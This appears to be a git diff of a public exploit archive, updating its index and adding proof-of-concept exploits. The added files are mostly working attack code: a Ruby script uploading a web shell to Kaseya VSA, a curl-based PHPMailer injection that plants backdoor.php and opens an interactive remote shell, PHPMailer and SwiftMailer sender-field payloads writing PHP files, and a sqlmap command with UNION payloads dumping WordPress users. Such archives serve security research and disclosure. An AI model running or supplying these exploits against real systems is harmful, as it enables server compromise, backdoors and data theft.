diff --git a/files.csv b/files.csv index 3a4279e43..5c6607b0f 100644 --- a/files.csv +++ b/files.csv @@ -11631,7 +11631,7 @@ id,file,description,date,author,platform,type,port 20095,platforms/multiple/remote/20095.txt,"Sun Java Web Server 1.1.3/2.0 Servlets - Exploits",2000-07-20,"kevin j",multiple,remote,0 20096,platforms/windows/remote/20096.txt,"Microsoft IIS 2.0/3.0/4.0/5.0/5.1 - Internal IP Address Disclosure",2000-07-13,"Dougal Campbell",windows,remote,0 20097,platforms/multiple/remote/20097.txt,"IBM Websphere Application Server 2.0./3.0/3.0.2.1 - Showcode",2000-07-24,"Shreeraj Shah",multiple,remote,0 -20103,platforms/windows/remote/20103.txt,"analogx SimpleServer:WWW 1.0.6 - Directory Traversal",2000-07-26,"Foundstone Inc.",windows,remote,0 +20103,platforms/windows/remote/20103.txt,"AnalogX SimpleServer:WWW 1.0.6 - Directory Traversal",2000-07-26,"Foundstone Inc.",windows,remote,0 20104,platforms/multiple/remote/20104.txt,"Roxen WebServer 2.0.x - '%00' Request File/Directory Disclosure",2000-07-21,zorgon,multiple,remote,0 20105,platforms/linux/remote/20105.txt,"Conectiva 4.x/5.x / RedHat 6.x - pam_console Remote User",2000-07-27,bkw1a,linux,remote,0 20106,platforms/windows/remote/20106.cpp,"Microsoft Windows NT 4/2000 - NetBIOS Name Conflict",2000-08-01,"Sir Dystic",windows,remote,0 @@ -19680,7 +19680,7 @@ id,file,description,date,author,platform,type,port 6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - SQL Injection",2008-10-14,EcHoLL,php,webapps,0 6749,platforms/php/webapps/6749.php,"Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0 -6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'success_story.php id' SQL Injection",2008-10-14,Hakxer,php,webapps,0 +6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'id' Parameter SQL Injection",2008-10-14,Hakxer,php,webapps,0 6755,platforms/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0 6758,platforms/php/webapps/6758.txt,"AstroSPACES - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0 6759,platforms/php/webapps/6759.txt,"mystats - 'hits.php' Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0 @@ -25012,7 +25012,7 @@ id,file,description,date,author,platform,type,port 17973,platforms/php/webapps/17973.txt,"WordPress Plugin GD Star Rating 1.9.10 - SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0 17955,platforms/php/webapps/17955.txt,"Filmis 0.2 Beta - Multiple Vulnerabilities",2011-10-10,M.Jock3R,php,webapps,0 17956,platforms/php/webapps/17956.txt,"6kbbs - Multiple Vulnerabilities",2011-10-10,"labs insight",php,webapps,0 -17957,platforms/php/webapps/17957.txt,"Roundcube 0.3.1 - Cross-Site Request Forgery / SQL Injection",2011-10-10,"Smith Falcon",php,webapps,0 +17957,platforms/php/webapps/17957.txt,"Roundcube Webmail 0.3.1 - Cross-Site Request Forgery / SQL Injection",2011-10-10,"Smith Falcon",php,webapps,0 17958,platforms/php/webapps/17958.txt,"cotonti CMS 0.9.4 - Multiple Vulnerabilities",2011-10-10,LiquidWorm,php,webapps,0 17959,platforms/php/webapps/17959.txt,"POSH - Multiple Vulnerabilities",2011-10-10,Crashfr,php,webapps,0 17961,platforms/php/webapps/17961.txt,"MyBB Advanced Forum Signatures - (afsignatures-2.0.4) SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 @@ -36339,7 +36339,7 @@ id,file,description,date,author,platform,type,port 39240,platforms/php/webapps/39240.txt,"WordPress Plugin BSK PDF Manager - 'wp-admin/admin.php' Multiple SQL Injection",2014-07-09,"Claudio Viviani",php,webapps,0 39241,platforms/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,java,webapps,4848 39243,platforms/php/webapps/39243.txt,"phpDolphin 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80 -39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80 +39245,platforms/php/webapps/39245.txt,"Roundcube Webmail 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39250,platforms/php/webapps/39250.txt,"WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,php,webapps,0 39251,platforms/php/webapps/39251.txt,"WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0 @@ -36921,4 +36921,8 @@ id,file,description,date,author,platform,type,port 40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0 40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0 40966,platforms/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,php,webapps,0 -40968,platforms/php/webapps/40968.php,"PHPMailer 5.2.17 - Remote Code Execution",2016-12-26,"Dawid Golunski",php,webapps,0 +40968,platforms/php/webapps/40968.php,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",php,webapps,0 +40970,platforms/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution (PHP)",2016-12-25,"Dawid Golunski",php,webapps,0 +40969,platforms/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",php,webapps,0 +40971,platforms/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",php,webapps,0 +40972,platforms/php/webapps/40972.php,"SwiftMailer < 5.4.5-DEV - Remote Code Execution",2016-12-28,"Dawid Golunski",php,webapps,0 diff --git a/platforms/asp/webapps/38351.txt b/platforms/asp/webapps/38351.txt index ababc1a0b..14857bd28 100755 --- a/platforms/asp/webapps/38351.txt +++ b/platforms/asp/webapps/38351.txt @@ -164,4 +164,179 @@ Nw5BxwW4Z7zCSHgBI6CYUTZQ0QvZFVZXOkix6+GnslzDwXu6m1cnY+PXa5K5jJtm /BMO8WVUvwPdUAeRMTweggoXOModWC/56BZNgquxTkayz2r9c7AdEr0aZDLYIxr0 OHLrGsL5XSDW9txZqDl9 =rF0G ------END PGP SIGNATURE----- \ No newline at end of file +-----END PGP SIGNATURE----- + + + + + + + + + + +#!/usr/bin/ruby +# +# kazPwn.rb - Kaseya VSA v7 to v9.1 authenticated arbitrary file upload (CVE-2015-6589 / ZDI-15-450) +# =================== +# by Pedro Ribeiro / Agile Information Security +# Disclosure date: 28/09/2015 +# +# Usage: ./kazPwn.rb http[s]://[:port] +# +# execjs and mechanize gems are required to run this exploit +# +# According to Kaseya's advisory, this exploit should work for the following VSA versions: +# VSA Version 7.0.0.0 – 7.0.0.32 +# VSA Version 8.0.0.0 – 8.0.0.22 +# VSA Version 9.0.0.0 – 9.0.0.18 +# VSA Version 9.1.0.0 – 9.1.0.8 +# This exploit has been tested with v8 and v9. +# +# Check out these two companion vulnerabilities, both of which have Metasploit modules: +# - Unauthenticated remote code execution (CVE-2015-6922 / ZDI-15-449) +# - Unauthenticated remote privilege escalation (CVE-2015-6922 / ZDI-15-448) +# +# This code is released under the GNU General Public License v3 +# http://www.gnu.org/licenses/gpl-3.0.html +# + +require 'execjs' +require 'mechanize' +require 'open-uri' +require 'uri' +require 'openssl' + +# avoid certificate errors +OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE +I_KNOW_THAT_OPENSSL_VERIFY_PEER_EQUALS_VERIFY_NONE_IS_WRONG = nil + +# Fixes a Mechanize bug, see +# http://scottwb.com/blog/2013/11/09/defeating-the-infamous-mechanize-too-many-connection-resets-bug/ +class Mechanize::HTTP::Agent + MAX_RESET_RETRIES = 10 + + # We need to replace the core Mechanize HTTP method: + # + # Mechanize::HTTP::Agent#fetch + # + # with a wrapper that handles the infamous "too many connection resets" + # Mechanize bug that is described here: + # + # https://github.com/sparklemotion/mechanize/issues/123 + # + # The wrapper shuts down the persistent HTTP connection when it fails with + # this error, and simply tries again. In practice, this only ever needs to + # be retried once, but I am going to let it retry a few times + # (MAX_RESET_RETRIES), just in case. + # + def fetch_with_retry( + uri, + method = :get, + headers = {}, + params = [], + referer = current_page, + redirects = 0 + ) + action = "#{method.to_s.upcase} #{uri.to_s}" + retry_count = 0 + + begin + fetch_without_retry(uri, method, headers, params, referer, redirects) + rescue Net::HTTP::Persistent::Error => e + # Pass on any other type of error. + raise unless e.message =~ /too many connection resets/ + + # Pass on the error if we've tried too many times. + if retry_count >= MAX_RESET_RETRIES + puts "**** WARN: Mechanize retried connection reset #{MAX_RESET_RETRIES} times and never succeeded: #{action}" + raise + end + + # Otherwise, shutdown the persistent HTTP connection and try again. + # puts "**** WARN: Mechanize retrying connection reset error: #{action}" + retry_count += 1 + self.http.shutdown + retry + end + end + + # Alias so #fetch actually uses our new #fetch_with_retry to wrap the + # old one aliased as #fetch_without_retry. + alias_method :fetch_without_retry, :fetch + alias_method :fetch, :fetch_with_retry +end + +if ARGV.length < 4 + puts 'Usage: ./kazPwn.rb http[s]://[:port] ' + exit -1 +end + +host = ARGV[0] +username = ARGV[1] +password = ARGV[2] +shell_file = ARGV[3] + +login_url = host + '/vsapres/web20/core/login.aspx' +agent = Mechanize.new + +# 1- go to the login URL, get a session cookie and the challenge. +page = agent.get(login_url) +login_form = page.forms.first +challenge = login_form['loginFormControl$ChallengeValueField'] + +# 2- calculate the password hashes with the challenge +source = open(host + "/inc/sha256.js").read +source += open(host + "/inc/coverPass.js").read +source += open(host + "/inc/coverPass256.js").read +source += open(host + "/inc/coverData.js").read +source += open(host + "/inc/passwordHashes.js").read +source.gsub!(/\<\!--(\s)*\#include.*--\>/, "") # remove any includes, this causes execjs to fail +context = ExecJS.compile(source) +hashes = context.call("getHashes",username,password,challenge) + +# 3- submit the login form, authenticate our cookie and get the ReferringWebWindowId needed to upload the file +# We need the following input values to login: +# - __EVENTTARGET (empty) +# - __EVENTARGUMENT (empty) +# - __VIEWSTATE (copied from the original GET request) +# - __VIEWSTATEENCRYPTED (copied from the original GET request; typically empty) +# - __EVENTVALIDATION (copied from the original GET request) +# - loginFormControl$UsernameTextbox (username) +# - loginFormControl$PasswordTextbox (empty) +# - loginFormControl$SubmitButton (copied from the original GET request; typically "Logon") +# - loginFormControl$SHA1Field (output from getHashes) +# - loginFormControl$RawSHA1Field (output from getHashes) +# - loginFormControl$SHA256Field (output from getHashes) +# - loginFormControl$RawSHA256Field (output from getHashes) +# - loginFormControl$ChallengeValueField (copied from the original GET request) +# - loginFormControl$TimezoneOffset ("0") +# - loginFormControl$ScreenHeight (any value between 800 - 2048) +# - loginFormControl$ScreenWidth (any value between 800 - 2048) +login_form['__EVENTTARGET'] = '' +login_form['__EVENTARGUMENT'] = '' +login_form['loginFormControl$UsernameTextbox'] = username +login_form['loginFormControl$SHA1Field'] = hashes['SHA1Hash'] +login_form['loginFormControl$RawSHA1Field'] = hashes['RawSHA1Hash'] +login_form['loginFormControl$SHA256Field'] = hashes['SHA256Hash'] +login_form['loginFormControl$RawSHA256Field'] = hashes['RawSHA256Hash'] +login_form['loginFormControl$TimezoneOffset'] = 0 +login_form['loginFormControl$SubmitButton'] = 'Logon' +login_form['loginFormControl$screenHeight'] = rand(800..2048) +login_form['loginFormControl$screenWidth'] = rand(800..2048) +page = agent.submit(login_form) +web_windowId = Hash[URI::decode_www_form(page.uri.query)]['ReferringWebWindowId'] + +# 4- upload the file using the ReferringWebWindowId +page = agent.post('/vsapres/web20/json.ashx', + 'directory' => "../WebPages", + 'ReferringWebWindowId' => web_windowId, + 'request' => 'uploadFile', + 'impinf__uploadfilelocation' => File.open(shell_file) +) + +if page.code == "200" + puts "Shell uploaded, check " + host + "/" + File.basename(shell_file) +else + puts "Error occurred, shell was not uploaded correctly..." +end \ No newline at end of file diff --git a/platforms/php/webapps/40968.php b/platforms/php/webapps/40968.php index 44473975b..116d0bf9c 100755 --- a/platforms/php/webapps/40968.php +++ b/platforms/php/webapps/40968.php @@ -1,79 +1,27 @@ - -09607 <<< -09607 <<< -09607 <<< -09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- - - -See the full advisory URL for details. - -*/ - - -// Attacker's input coming from untrusted source such as $_GET , $_POST etc. -// For example from a Contact form - -$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com'; -$msg_body = ""; - -// ------------------ - - -// mail() param injection via the vulnerability in PHPMailer - -require_once('class.phpmailer.php'); -$mail = new PHPMailer(); // defaults to using php "mail()" - -$mail->SetFrom($email_from, 'Client Name'); - -$address = "customer_feedback@company-X.com"; -$mail->AddAddress($address, "Some User"); - -$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033"; -$mail->MsgHTML($msg_body); - -if(!$mail->Send()) { - echo "Mailer Error: " . $mail->ErrorInfo; -} else { - echo "Message sent!\n"; -} - - - -?> +echo '[+] Exploiting '$host +curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php' +cmd='whoami' +while [ "$cmd" != 'exit' ] +do + echo '[+] Running '$cmd + curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d + echo + read -p 'RemoteShell> ' cmd +done +echo '[+] Exiting' \ No newline at end of file diff --git a/platforms/php/webapps/40969.pl b/platforms/php/webapps/40969.pl new file mode 100755 index 000000000..27c9d6856 --- /dev/null +++ b/platforms/php/webapps/40969.pl @@ -0,0 +1,64 @@ +#!/usr/bin/python + +intro = """ +PHPMailer RCE PoC Exploits + +PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) ++ +PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) +(the bypass of the first patch for CVE-2016-10033) + +Discovered and Coded by: + + Dawid Golunski + @dawid_golunski + https://legalhackers.com + +""" +usage = """ +Usage: + +Full Advisory: +https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html + +https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html + +PoC Video: +https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html + +Disclaimer: +For testing purposes only. Do no harm. + +""" + +import time +import urllib +import urllib2 +import socket +import sys + +RW_DIR = "/var/www/html/uploads" + +url = 'http://VictimWebServer/contact_form.php' # Set destination URL here + +# Choose/uncomment one of the payloads: + +# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) +#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR + +# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) +payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR + +###################################### + +# PHP code to be saved into the backdoor php file on the target in RW_DIR +RCE_PHP_CODE = "" + +post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE} + +# Attack +data = urllib.urlencode(post_fields) +req = urllib2.Request(url, data) +response = urllib2.urlopen(req) +the_page = response.read() + diff --git a/platforms/php/webapps/40970.php b/platforms/php/webapps/40970.php new file mode 100755 index 000000000..930d1ce8e --- /dev/null +++ b/platforms/php/webapps/40970.php @@ -0,0 +1,75 @@ + +09607 <<< +09607 <<< +09607 <<< +09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- + + +See the full advisory URL for details. + +*/ + + +// Attacker's input coming from untrusted source such as $_GET , $_POST etc. +// For example from a Contact form + +$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com'; +$msg_body = ""; + +// ------------------ + + +// mail() param injection via the vulnerability in PHPMailer + +require_once('class.phpmailer.php'); +$mail = new PHPMailer(); // defaults to using php "mail()" + +$mail->SetFrom($email_from, 'Client Name'); + +$address = "customer_feedback@company-X.com"; +$mail->AddAddress($address, "Some User"); + +$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033"; +$mail->MsgHTML($msg_body); + +if(!$mail->Send()) { + echo "Mailer Error: " . $mail->ErrorInfo; +} else { + echo "Message sent!\n"; +} + +?> diff --git a/platforms/php/webapps/40971.txt b/platforms/php/webapps/40971.txt new file mode 100755 index 000000000..7a197dc28 --- /dev/null +++ b/platforms/php/webapps/40971.txt @@ -0,0 +1,64 @@ +# Exploit Title: Simply Poll 1.4.1 Plugin for WordPress ­ SQL Injection +# Date: 21/12/2016 +# Exploit Author: TAD GROUP +# Vendor Homepage: https://wordpress.org/plugins/simply-poll/ +# Software Link: https://wordpress.org/plugins/simply-poll/ +# Contact: info@tad.bg +# Website: http://tad.bg +# Category: Web Application Exploits + +1 - Description + +An unescaped parameter was found in Simply Poll version 1.4.1. ( WP +plugin ). An attacker can exploit this vulnerability to read from the +database. +The POST parameter 'pollid' is vulnerable. + + +2. Proof of Concept + + sqlmap -u "http://example.com/wp-admin/admin-ajax.php" +--data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress +--threads=10 --random-agent --dbms=mysql --level=5 --risk=3 + +Parameter: pollid (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: action=spAjaxResults&pollid=2 AND 6034=6034 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: action=spAjaxResults&pollid=2 AND SLEEP(5) + + Type: UNION query + Title: Generic UNION query (NULL) - 7 columns + Payload: action=spAjaxResults&pollid=-7159 UNION ALL SELECT +NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7171,0x55746570525a68726d4a634844657 +9564f524752646c786a5451775272645a6e734b766657534c44,0x7162627171),NULL-- +CfNO + + +3. Attack outcome: + +An attacker can read arbitrary data from the database. If the webserver +is misconfigured, read & write access the filesystem may be possible. + + +4 Impact: + +Critical + + +5. Affected versions: + +<= 1.4.1 + +6. Disclosure Timeline: + +21-Dec-2016 ­ found the vulnerability +21-Dec-2016 ­ informed the developer +28-Dec-2016 ­ release date of this security advisory + +Not fixed at the date of submitting that exploit. + + diff --git a/platforms/php/webapps/40972.php b/platforms/php/webapps/40972.php new file mode 100755 index 000000000..930a771c3 --- /dev/null +++ b/platforms/php/webapps/40972.php @@ -0,0 +1,78 @@ + +09607 <<< +09607 <<< +09607 <<< + + +See the full advisory URL for the exploit details. + +*/ + + +// Attacker's input coming from untrusted source such as $_GET , $_POST etc. +// For example from a Contact form with sender field + +$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com'; + +// ------------------ + +// mail() param injection via the vulnerability in SwiftMailer + +require_once 'lib/swift_required.php'; +// Mail transport +$transport = Swift_MailTransport::newInstance(); +// Create the Mailer using your created Transport +$mailer = Swift_Mailer::newInstance($transport); + +// Create a message +$message = Swift_Message::newInstance('Swift PoC exploit') + ->setFrom(array($email_from => 'PoC Exploit Payload')) + ->setTo(array('receiver@domain.org', 'other@domain.org' => 'A name')) + ->setBody('Here is the message itself') + ; +// Send the message with PoC payload in 'from' field +$result = $mailer->send($message); + +?>